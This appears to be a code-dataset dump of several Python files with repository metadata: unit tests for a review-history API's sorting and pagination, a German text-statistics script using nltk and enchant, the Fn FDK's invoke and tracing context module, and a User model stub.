'Student') self.assertEqual(data['reviews'][1]['final_verdict'], 'Yes') self.assertEqual(data['reviews'][2]['review_response_id'], 5) self.assertEqual(data['reviews'][2]['nationality_country'], 'Zimbabwe') self.assertEqual(data['reviews'][2]['residence_country'], 'Mozambique') self.assertEqual(data['reviews'][2]['affiliation'], 'UFH') self.assertEqual(data['reviews'][2]['department'], 'Phys') self.assertEqual(data['reviews'][2]['user_category'], 'MSc') self.assertEqual(data['reviews'][2]['final_verdict'], 'Maybe') def test_brings_back_only_logged_in_reviewer_reviewresponses(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r2@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(len(data['reviews']), 2) self.assertEqual(data['reviews'][0]['review_response_id'], 3) self.assertEqual(data['reviews'][1]['review_response_id'], 4) def test_logged_in_user_not_reviewer(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('c1@c.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) self.assertEqual(response.status_code, FORBIDDEN[1]) def setup_reviewer_with_no_reviewresponses(self): reviewer = EventRole('reviewer', 1, 1) db.session.add(reviewer) db.session.commit() def test_reviewer_with_no_reviewresponses(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() self.setup_reviewer_with_no_reviewresponses() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'review_response_id'} header = 
self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['num_entries'], 0) self.assertEqual(data['reviews'], []) def test_order_by_reviewresponseid(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['review_response_id'], 1) self.assertEqual(data['reviews'][1]['review_response_id'], 2) self.assertEqual(data['reviews'][2]['review_response_id'], 5) def setup_reviewresponses_with_unordered_timestamps(self): final_verdict_options = [ {'label': 'Yes', 'value': 2}, {'label': 'No', 'value': 0}, {'label': 'Maybe', 'value': 1}, ] verdict_question = ReviewQuestion(1, None, None, 'Final Verdict', 'multi-choice', None, final_verdict_options, True, 3, None, None, 0) db.session.add(verdict_question) db.session.commit() responses = [ Response(1, 5, is_submitted=True), Response(1, 6, is_submitted=True), Response(1, 7, is_submitted=True) ] db.session.add_all(responses) db.session.commit() review_response_1 = ReviewResponse(1,3,1) review_response_2 = ReviewResponse(1,3,2) review_response_3 = ReviewResponse(1,3,3) review_response_1.submitted_timestamp = datetime(2019, 1, 1) review_response_2.submitted_timestamp = datetime(2018, 1, 1) review_response_3.submitted_timestamp = datetime(2018, 6, 6) review_responses = [review_response_1, review_response_2, review_response_3] review_responses[0].review_scores = [ReviewScore(1, '67'), ReviewScore(5, 'Yes')] review_responses[1].review_scores = [ReviewScore(1, '23'), ReviewScore(5, 'Yes')] review_responses[2].review_scores = [ReviewScore(1, '53'), ReviewScore(5, 'Yes')] 
db.session.add_all(review_responses) db.session.commit() def test_order_by_submittedtimestamp(self): self.seed_static_data() self.setup_reviewresponses_with_unordered_timestamps() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'submitted_timestamp'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) LOGGER.debug(data) self.assertEqual(data['reviews'][0]['submitted_timestamp'], '2018-01-01T00:00:00') self.assertEqual(data['reviews'][1]['submitted_timestamp'], '2018-06-06T00:00:00') self.assertEqual(data['reviews'][2]['submitted_timestamp'], '2019-01-01T00:00:00') def test_order_by_nationalitycountry(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'nationality_country'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['nationality_country'], 'Botswana') self.assertEqual(data['reviews'][1]['nationality_country'], 'South Africa') self.assertEqual(data['reviews'][2]['nationality_country'], 'Zimbabwe') def test_order_by_residencecountry(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'residence_country'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['residence_country'], 'Egypt') self.assertEqual(data['reviews'][1]['residence_country'], 'Mozambique') self.assertEqual(data['reviews'][2]['residence_country'], 'Namibia') def test_order_by_affiliation(self): 
self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'affiliation'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['affiliation'], 'RU') self.assertEqual(data['reviews'][1]['affiliation'], 'UFH') self.assertEqual(data['reviews'][2]['affiliation'], 'UWC') def test_order_by_department(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'department'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['department'], 'CS') # ascii ordering orders capital letters before lowercase self.assertEqual(data['reviews'][1]['department'], 'Chem') self.assertEqual(data['reviews'][2]['department'], 'Phys') def test_order_by_usercategory(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'user_category'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['user_category'], 'Honours') self.assertEqual(data['reviews'][1]['user_category'], 'MSc') self.assertEqual(data['reviews'][2]['user_category'], 'Student') def test_order_by_finalverdict(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 10, 'sort_column' : 'final_verdict'} header = 
self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['reviews'][0]['final_verdict'], 'Maybe') self.assertEqual(data['reviews'][1]['final_verdict'], 'Maybe') self.assertEqual(data['reviews'][2]['final_verdict'], 'Yes') def setup_two_extra_responses_for_reviewer3(self): responses = [ Response(1, 8, is_submitted=True), Response(1, 1, is_submitted=True) ] db.session.add_all(responses) db.session.commit() review_responses = [ ReviewResponse(1,3,4), ReviewResponse(1,3,5) ] review_responses[0].review_scores = [ReviewScore(1, '89'), ReviewScore(5, 'Maybe')] review_responses[1].review_scores = [ReviewScore(1, '75'), ReviewScore(5, 'Yes')] db.session.add_all(review_responses) db.session.commit() def test_first_page_in_pagination(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() self.setup_two_extra_responses_for_reviewer3() params ={'event_id' : 1, 'page_number' : 0, 'limit' : 2, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(len(data['reviews']), 2) self.assertEqual(data['num_entries'], 5) self.assertEqual(data['reviews'][0]['review_response_id'], 1) self.assertEqual(data['reviews'][1]['review_response_id'], 2) def test_middle_page_in_pagination(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() self.setup_two_extra_responses_for_reviewer3() params ={'event_id' : 1, 'page_number' : 1, 'limit' : 2, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(len(data['reviews']), 2) 
self.assertEqual(data['num_entries'], 5) self.assertEqual(data['reviews'][0]['review_response_id'], 5) self.assertEqual(data['reviews'][1]['review_response_id'], 6) def test_last_page_in_pagination(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() self.setup_two_extra_responses_for_reviewer3() params ={'event_id' : 1, 'page_number' : 2, 'limit' : 2, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(len(data['reviews']), 1) self.assertEqual(data['num_entries'], 5) self.assertEqual(data['reviews'][0]['review_response_id'], 7) def test_total_number_of_pages_greater_than_zero(self): self.seed_static_data() self.setup_reviewer_responses_finalverdict_reviewquestion_reviewresponses_and_scores() self.setup_two_extra_responses_for_reviewer3() params ={'event_id' : 1, 'page_number' : 2, 'limit' : 2, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r3@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['total_pages'], 3) def test_total_number_of_pages_when_zero(self): self.seed_static_data() self.setup_reviewer_with_no_reviewresponses() params ={'event_id' : 1, 'page_number' : 2, 'limit' : 2, 'sort_column' : 'review_response_id'} header = self.get_auth_header_for('r1@r.com') response = self.app.get('/api/v1/reviewhistory', headers=header, data=params) data = json.loads(response.data) self.assertEqual(data['total_pages'], 0)
50,461
2,172
24
fccd3577beac65370c5b11906b2378b151aeac75
10,050
py
Python
TextAnalyzer.py
GoetzEdinger/TextAnalyzer
ca305163fce52ade2edd20d80902911fc022f175
[ "MIT" ]
1
2015-07-12T21:31:27.000Z
2015-07-12T21:31:27.000Z
TextAnalyzer.py
GoetzEdinger/TextAnalyzer
ca305163fce52ade2edd20d80902911fc022f175
[ "MIT" ]
null
null
null
TextAnalyzer.py
GoetzEdinger/TextAnalyzer
ca305163fce52ade2edd20d80902911fc022f175
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- ''' Created on 09.07.2015 @author: Goetz Edinger ''' import enchant import nltk.data from nltk.tokenize import sent_tokenize from nltk.tokenize import word_tokenize import string import sys debug = True dict_sentence_length = {} dict_word_length = {} number_of_letters = 0 number_of_words = 0 number_of_sentences = 0 average_length_word = 0 number_of_foreign_words = 0 average_length_sentence = 0 length_shortest_word = 10000 length_longest_word = 0 length_of_all_words = 0 length_shortest_sentence = 10000 length_longest_sentence = 0 length_of_all_sentences = 0 number_of_words_long_sentence = 0 shortest_word = "" longest_word = "" ######################################################## # # Split Text into words # Count the letters of every word # Count how many words have how many letters # ######################################################## ######################################################## # # Split Text into sentences # Count the words of every sentence # Count how many sentences have how many words # ######################################################## ######################################################## # # Count foreign words # ######################################################## ######################################################## # # Display results # ######################################################## ######################################################## # # Statistics: # # Thresholds: # # for words: # green == good () # yellow == acceptable () # red == not acceptable () # # for sentences: # green == good () # yellow == acceptable () # red == not acceptable () # # Calculate the average length of the words # Calculate the average length of the sentences # ######################################################## if __name__ == '__main__': main(sys.argv[1:])
36.948529
931
0.644279
# -*- coding: utf-8 -*- ''' Created on 09.07.2015 @author: Goetz Edinger ''' import enchant import nltk.data from nltk.tokenize import sent_tokenize from nltk.tokenize import word_tokenize import string import sys debug = True dict_sentence_length = {} dict_word_length = {} number_of_letters = 0 number_of_words = 0 number_of_sentences = 0 average_length_word = 0 number_of_foreign_words = 0 average_length_sentence = 0 length_shortest_word = 10000 length_longest_word = 0 length_of_all_words = 0 length_shortest_sentence = 10000 length_longest_sentence = 0 length_of_all_sentences = 0 number_of_words_long_sentence = 0 shortest_word = "" longest_word = "" def count_letters(text): global number_of_letters number_of_letters = len(text) ######################################################## # # Split Text into words # Count the letters of every word # Count how many words have how many letters # ######################################################## def tokenize_words(text): global number_of_words global dict_word_length global length_of_all_words global length_longest_word global length_shortest_word global shortest_word global longest_word word_tokenize_list = word_tokenize(text) count_foreign_words(word_tokenize_list) number_of_words = len(word_tokenize_list) for word in word_tokenize_list: if word in [",", ".", ":", ";", "!", "?"]: number_of_words -= 1 for word in word_tokenize_list: if word not in [",", ".", ":", ";", "!", "?"]: # Get the length of the word word_length = len(word) # Get the longest word if word_length > length_longest_word: length_longest_word = word_length longest_word = word # Get the shortest word if word_length < length_shortest_word: length_shortest_word = word_length shortest_word = word # Add word_length to length_of_all_words which is a variable to compute the average_length_word length_of_all_words += word_length # Look up in the Dictionary dict_word_length, if there is already a key with the same length. 
if dict_word_length.has_key(word_length): # If yes, then get the value of that key ... old_key = dict_word_length.get(word_length) # ... increase the value ... new_key = old_key + 1 # ... write the key/value pair to the Dictionary dict_word_length dict_word_length[word_length] = new_key else: # ... add new key (word_length) with value 1 dict_word_length[word_length] = 1 ######################################################## # # Split Text into sentences # Count the words of every sentence # Count how many sentences have how many words # ######################################################## def tokenize_sentences(text): global length_longest_sentence global length_shortest_sentence global dict_sentence_length global number_of_sentences global length_of_all_sentences german_tokenizer = nltk.data.load('tokenizers/punkt/german.pickle') sent_tokenize_list = german_tokenizer.tokenize(text) number_of_sentences = len(sent_tokenize_list) if debug: print "\nSätze\n" for sentence in sent_tokenize_list: if debug: print sentence # Get the length of the sentence sentence_length = len(sentence) # Add sentence_length to length_of_all_sentences which is a variable to compute the average_length_sentence length_of_all_sentences += sentence_length # Get the longest sentence if sentence_length > length_longest_sentence: length_longest_sentence = sentence_length # Get the shortest sentence if sentence_length < length_shortest_sentence: length_shortest_sentence = sentence_length # Look up in the Dictionary dict_sentence_length, if there is already a key with the same length. if dict_sentence_length.has_key(sentence_length): # If yes, then get the value of that key ... old_key = dict_sentence_length.get(sentence_length) # ... increase the value ... new_key = old_key + 1 # ... write the key/value pair to the Dictionary dict_sentence_length dict_sentence_length[sentence_length] = new_key else: # ... 
add new key (sentence_length) with value 1 dict_sentence_length[sentence_length] = 1 ######################################################## # # Count foreign words # ######################################################## def count_foreign_words(word_list): global number_of_foreign_words d = enchant.Dict("de_DE") if debug: print "Fremdwörter\n" for word in word_list: if not d.check(word): if word not in [",", ".", ":", ";", "!", "?"]: number_of_foreign_words += 1 if debug: print word ######################################################## # # Display results # ######################################################## def display_results(): global number_of_letters global number_of_words global number_of_sentences global average_length_word global number_of_foreign_words global average_length_sentence global length_shortest_word global length_longest_word global length_shortest_sentence global length_longest_sentence global shortest_word global longest_word if debug: print "Number of letters : " + str(number_of_letters) print "Number of words : " + str(number_of_words) print "Number of sentences : " + str(number_of_sentences) print "Average length of words : " + str(average_length_word) print "Number of foreign words : " + str(number_of_foreign_words) print "Average length of sentences : " + str(average_length_sentence) print "Length of the shortest word : " + str(length_shortest_word) print "Shortest word : " + shortest_word print "Length of the longest word : " + str(length_longest_word) print "Longest word : " + longest_word print "Length of the shortest sentence: " + str(length_shortest_sentence) print "Length of the longest sentence : " + str(length_longest_sentence) ######################################################## # # Statistics: # # Thresholds: # # for words: # green == good () # yellow == acceptable () # red == not acceptable () # # for sentences: # green == good () # yellow == acceptable () # red == not acceptable () # # Calculate the average 
length of the words # Calculate the average length of the sentences # ######################################################## def statistics(): global length_of_all_words global number_of_words global average_length_word global length_of_all_sentences global number_of_sentences global average_length_sentence # Calculate the average length of the words average_length_word = length_of_all_words/number_of_words # Calculate the average length of the sentences average_length_sentence = length_of_all_sentences/number_of_sentences def get_text_from_file(filename): text = "" try: file = open(filename, 'r') text = file.read() return text except: return text def main(argv): text = """Raum- und Zeitangaben sind in der Relativitätstheorie keine universell gültigen Ordnungsstrukturen. Vielmehr werden der räumliche und zeitliche Abstand zweier Ereignisse oder auch deren Gleichzeitigkeit von Beobachtern mit verschiedenen Bewegungszuständen unterschiedlich beurteilt. Bewegte Objekte erweisen sich im Vergleich zum Ruhezustand in Bewegungsrichtung als verkürzt und bewegte Uhren als verlangsamt. Da jedoch jeder gleichförmig bewegte Beobachter den Standpunkt vertreten kann, er sei in Ruhe, beruhen diese Beobachtungen auf Gegenseitigkeit, das heißt, zwei relativ zueinander bewegte Beobachter sehen die Uhren des jeweils anderen langsamer gehen. Außerdem sind aus ihrer Sicht die Meterstäbe des jeweils anderen kürzer als ein Meter, wenn sie längs der Bewegungsrichtung ausgerichtet sind. Die Frage, wer die Situation korrekt beschreibt, ist hierbei prinzipiell nicht zu beantworten und daher sinnlos. Diese Längenkontraktion und Zeitdilatation lassen sich vergleichsweise anschaulich anhand von Minkowski-Diagrammen und anhand des bekannten Zwillingsparadoxons nachvollziehen. In der mathematischen Formulierung ergeben sie sich aus der Lorentz-Transformation, die den Zusammenhang zwischen den Raum- und Zeitkoordinaten der verschiedenen Beobachter beschreibt. 
Diese Transformation lässt sich direkt aus den beiden obigen Axiomen und der Annahme, dass sie linear ist, herleiten. Die meisten dieser relativistisch erklärbaren Phänomene machen sich erst bei Geschwindigkeiten bemerkbar, die im Vergleich zur Lichtgeschwindigkeit nennenswert groß sind. Solche Geschwindigkeiten werden im Alltag nicht annähernd erreicht. John Smith ist ein Märchenerzähler. Der 1. Mai ist ein Feiertag. Hol's der Kuckuck!""" if len(argv) > 0: text = get_text_from_file(argv[0]) if len(argv) > 1: print "usage: python TextAnalyzer" print "or" print "python TextAnalyzer <filename>" else: if len(text) > 2: count_letters(text) tokenize_words(text) tokenize_sentences(text) statistics() display_results() else: print "Something went wrong ..." if __name__ == '__main__': main(sys.argv[1:])
7,907
0
184
6dcb4bfbb7a76895bfedb5f55a7a7983bbd60f32
11,375
py
Python
fdk/context.py
jlowe000/fdk-python
d7b96bcb974733792cc29d0afd3d86b3f120ac54
[ "ECL-2.0", "Apache-2.0" ]
44
2017-11-03T14:59:07.000Z
2022-01-17T18:58:07.000Z
fdk/context.py
jlowe000/fdk-python
d7b96bcb974733792cc29d0afd3d86b3f120ac54
[ "ECL-2.0", "Apache-2.0" ]
66
2017-11-28T16:01:55.000Z
2021-07-28T11:20:13.000Z
fdk/context.py
jlowe000/fdk-python
d7b96bcb974733792cc29d0afd3d86b3f120ac54
[ "ECL-2.0", "Apache-2.0" ]
16
2017-12-08T15:58:43.000Z
2022-01-28T16:08:36.000Z
# # Copyright (c) 2019, 2020 Oracle and/or its affiliates. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import datetime as dt import io import os import random from fdk import constants from fdk import headers as hs from fdk import log from collections import namedtuple def context_from_format(format_def: str, **kwargs) -> ( InvokeContext, io.BytesIO): """ Creates a context from request :param format_def: function format :type format_def: str :param kwargs: request-specific map of parameters :return: invoke context and data :rtype: tuple """ app_id = os.environ.get(constants.FN_APP_ID) fn_id = os.environ.get(constants.FN_ID) app_name = os.environ.get(constants.FN_APP_NAME) fn_name = os.environ.get(constants.FN_NAME) # the tracing enabled env variable is passed as a "0" or "1" string # and therefore needs to be converted appropriately. is_tracing_enabled = os.environ.get(constants.OCI_TRACING_ENABLED) is_tracing_enabled = ( bool(int(is_tracing_enabled)) if is_tracing_enabled is not None else False ) trace_collector_url = os.environ.get(constants.OCI_TRACE_COLLECTOR_URL) if format_def == constants.HTTPSTREAM: data = kwargs.get("data") headers = kwargs.get("headers") # zipkin tracing http headers trace_id = span_id = parent_span_id = is_sampled = trace_flags = None tracing_context = None if is_tracing_enabled: # we generate the trace_id if tracing is enabled # but the traceId zipkin header is missing. 
trace_id = headers.get(constants.X_B3_TRACEID) trace_id = generate_id() if trace_id is None else trace_id span_id = headers.get(constants.X_B3_SPANID) parent_span_id = headers.get(constants.X_B3_PARENTSPANID) # span_id is also generated if the zipkin header is missing. span_id = generate_id() if span_id is None else span_id # is_sampled should be a boolean in the form of a "0/1" but # legacy samples have them as "False/True" is_sampled = headers.get(constants.X_B3_SAMPLED) is_sampled = int(is_sampled) if is_sampled is not None else 1 # not currently used but is defined by the zipkin headers standard trace_flags = headers.get(constants.X_B3_FLAGS) # tracing context will be an empty object # if tracing is not enabled or the flag is missing. # this prevents the customer code from failing if they decide to # disable tracing. An empty tracing context will not # emit spans due to is_sampled being None. tracing_context = TracingContext( is_tracing_enabled, trace_collector_url, trace_id, span_id, parent_span_id, is_sampled, trace_flags ) method = headers.get(constants.FN_HTTP_METHOD) request_url = headers.get(constants.FN_HTTP_REQUEST_URL) deadline = headers.get(constants.FN_DEADLINE) call_id = headers.get(constants.FN_CALL_ID) content_type = headers.get(constants.CONTENT_TYPE) ctx = InvokeContext( app_id, app_name, fn_id, fn_name, call_id, content_type=content_type, deadline=deadline, config=os.environ, headers=headers, method=method, request_url=request_url, fn_format=constants.HTTPSTREAM, tracing_context=tracing_context, ) return ctx, data
32.78098
78
0.63833
# # Copyright (c) 2019, 2020 Oracle and/or its affiliates. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import datetime as dt import io import os import random from fdk import constants from fdk import headers as hs from fdk import log from collections import namedtuple class InvokeContext(object): def __init__(self, app_id, app_name, fn_id, fn_name, call_id, content_type="application/octet-stream", deadline=None, config=None, headers=None, request_url=None, method="POST", fn_format=None, tracing_context=None): """ Request context here to be a placeholder for request-specific attributes :param app_id: Fn App ID :type app_id: str :param app_name: Fn App name :type app_name: str :param fn_id: Fn App Fn ID :type fn_id: str :param fn_name: Fn name :type fn_name: str :param call_id: Fn call ID :type call_id: str :param content_type: request content type :type content_type: str :param deadline: request deadline :type deadline: str :param config: an app/fn config :type config: dict :param headers: request headers :type headers: dict :param request_url: request URL :type request_url: str :param method: request method :type method: str :param fn_format: function format :type fn_format: str :param tracing_context: tracing context :type tracing_context: TracingContext """ self.__app_id = app_id self.__fn_id = fn_id self.__call_id = call_id self.__config = config if config else {} self.__headers = headers if headers else {} self.__http_headers = {} self.__deadline = 
deadline self.__content_type = content_type self._request_url = request_url self._method = method self.__response_headers = {} self.__fn_format = fn_format self.__app_name = app_name self.__fn_name = fn_name self.__tracing_context = tracing_context if tracing_context else None log.log("request headers. gateway: {0} {1}" .format(self.__is_gateway(), headers)) if self.__is_gateway(): self.__headers = hs.decap_headers(headers, True) self.__http_headers = hs.decap_headers(headers, False) def AppID(self): return self.__app_id def AppName(self): return self.__app_name def FnID(self): return self.__fn_id def FnName(self): return self.__fn_name def CallID(self): return self.__call_id def Config(self): return self.__config def Headers(self): return self.__headers def HTTPHeaders(self): return self.__http_headers def Format(self): return self.__fn_format def TracingContext(self): return self.__tracing_context def Deadline(self): if self.__deadline is None: now = dt.datetime.now(dt.timezone.utc).astimezone() now += dt.timedelta(0, float(constants.DEFAULT_DEADLINE)) return now.isoformat() return self.__deadline def SetResponseHeaders(self, headers, status_code): log.log("setting headers. 
gateway: {0}".format(self.__is_gateway())) if self.__is_gateway(): headers = hs.encap_headers(headers, status=status_code) for k, v in headers.items(): self.__response_headers[k.lower()] = v def GetResponseHeaders(self): return self.__response_headers def RequestURL(self): return self._request_url def Method(self): return self._method def __is_gateway(self): return (constants.FN_INTENT in self.__headers and self.__headers.get(constants.FN_INTENT) == constants.INTENT_HTTP_REQUEST) class TracingContext(object): def __init__(self, is_tracing_enabled, trace_collector_url, trace_id, span_id, parent_span_id, is_sampled, flags): """ Tracing context here to be a placeholder for tracing-specific attributes :param is_tracing_enabled: tracing enabled flag :type is_tracing_enabled: bool :param trace_collector_url: APM Trace Collector Endpoint URL :type trace_collector_url: str :param trace_id: Trace ID :type trace_id: str :param span_id: Span ID :type span_id: str :param parent_span_id: Parent Span ID :type parent_span_id: str :param is_sampled: Boolean for emmitting spans :type is_sampled: int (0 or 1) :param flags: Debug flags :type flags: int (0 or 1) """ self.__is_tracing_enabled = is_tracing_enabled self.__trace_collector_url = trace_collector_url self.__trace_id = trace_id self.__span_id = span_id self.__parent_span_id = parent_span_id self.__is_sampled = is_sampled self.__flags = flags self.__app_name = os.environ.get(constants.FN_APP_NAME) self.__app_id = os.environ.get(constants.FN_APP_ID) self.__fn_name = os.environ.get(constants.FN_NAME) self.__fn_id = os.environ.get(constants.FN_ID) self.__zipkin_attrs = self.__create_zipkin_attrs(is_tracing_enabled) def is_tracing_enabled(self): return self.__is_tracing_enabled def trace_collector_url(self): return self.__trace_collector_url def trace_id(self): return self.__trace_id def span_id(self): return self.__span_id def parent_span_id(self): return self.__parent_span_id def is_sampled(self): return bool(self.__is_sampled) 
def flags(self): return self.__flags def zipkin_attrs(self): return self.__zipkin_attrs # this is a helper method specific for py_zipkin def __create_zipkin_attrs(self, is_tracing_enabled): ZipkinAttrs = namedtuple( "ZipkinAttrs", "trace_id, span_id, parent_span_id, is_sampled, flags" ) trace_id = self.__trace_id span_id = self.__span_id parent_span_id = self.__parent_span_id is_sampled = bool(self.__is_sampled) trace_flags = self.__flags # As the fnLb sends the parent_span_id as the span_id # assign the parent span id as the span id. if is_tracing_enabled: parent_span_id = span_id span_id = generate_id() zipkin_attrs = ZipkinAttrs( trace_id, span_id, parent_span_id, is_sampled, trace_flags ) return zipkin_attrs def service_name(self, override=None): # in case of missing app and function name env variables service_name = ( override if override is not None else str(self.__app_name) + "::" + str(self.__fn_name) ) return service_name.lower() def annotations(self): annotations = { "generatedBy": "faas", "appName": self.__app_name, "appID": self.__app_id, "fnName": self.__fn_name, "fnID": self.__fn_id, } return annotations def generate_id(): return "{:016x}".format(random.getrandbits(64)) def context_from_format(format_def: str, **kwargs) -> ( InvokeContext, io.BytesIO): """ Creates a context from request :param format_def: function format :type format_def: str :param kwargs: request-specific map of parameters :return: invoke context and data :rtype: tuple """ app_id = os.environ.get(constants.FN_APP_ID) fn_id = os.environ.get(constants.FN_ID) app_name = os.environ.get(constants.FN_APP_NAME) fn_name = os.environ.get(constants.FN_NAME) # the tracing enabled env variable is passed as a "0" or "1" string # and therefore needs to be converted appropriately. 
is_tracing_enabled = os.environ.get(constants.OCI_TRACING_ENABLED) is_tracing_enabled = ( bool(int(is_tracing_enabled)) if is_tracing_enabled is not None else False ) trace_collector_url = os.environ.get(constants.OCI_TRACE_COLLECTOR_URL) if format_def == constants.HTTPSTREAM: data = kwargs.get("data") headers = kwargs.get("headers") # zipkin tracing http headers trace_id = span_id = parent_span_id = is_sampled = trace_flags = None tracing_context = None if is_tracing_enabled: # we generate the trace_id if tracing is enabled # but the traceId zipkin header is missing. trace_id = headers.get(constants.X_B3_TRACEID) trace_id = generate_id() if trace_id is None else trace_id span_id = headers.get(constants.X_B3_SPANID) parent_span_id = headers.get(constants.X_B3_PARENTSPANID) # span_id is also generated if the zipkin header is missing. span_id = generate_id() if span_id is None else span_id # is_sampled should be a boolean in the form of a "0/1" but # legacy samples have them as "False/True" is_sampled = headers.get(constants.X_B3_SAMPLED) is_sampled = int(is_sampled) if is_sampled is not None else 1 # not currently used but is defined by the zipkin headers standard trace_flags = headers.get(constants.X_B3_FLAGS) # tracing context will be an empty object # if tracing is not enabled or the flag is missing. # this prevents the customer code from failing if they decide to # disable tracing. An empty tracing context will not # emit spans due to is_sampled being None. 
tracing_context = TracingContext( is_tracing_enabled, trace_collector_url, trace_id, span_id, parent_span_id, is_sampled, trace_flags ) method = headers.get(constants.FN_HTTP_METHOD) request_url = headers.get(constants.FN_HTTP_REQUEST_URL) deadline = headers.get(constants.FN_DEADLINE) call_id = headers.get(constants.FN_CALL_ID) content_type = headers.get(constants.CONTENT_TYPE) ctx = InvokeContext( app_id, app_name, fn_id, fn_name, call_id, content_type=content_type, deadline=deadline, config=os.environ, headers=headers, method=method, request_url=request_url, fn_format=constants.HTTPSTREAM, tracing_context=tracing_context, ) return ctx, data
2,729
4,417
69
e8b50469be455015225ee1e1a7a899709b2a0f60
1,622
py
Python
models/user.py
CodeByMini/thefriendzone
84c3dd14ba2b0be7cf3cd681f761d3d6780498d4
[ "Apache-2.0" ]
null
null
null
models/user.py
CodeByMini/thefriendzone
84c3dd14ba2b0be7cf3cd681f761d3d6780498d4
[ "Apache-2.0" ]
null
null
null
models/user.py
CodeByMini/thefriendzone
84c3dd14ba2b0be7cf3cd681f761d3d6780498d4
[ "Apache-2.0" ]
null
null
null
from models.status import Status from datetime import datetime class User: """ The User object represents a person, bot or entity registered as a user in the application. username: (str) password: (str) last_seen: (str) timestamp when the user was latest recorded as active. Mutates with update_last_seen(). buddies: (dict <str, User>) status: (Status enum) """ @property @username.setter @property @password.setter @property @property
22.84507
71
0.600493
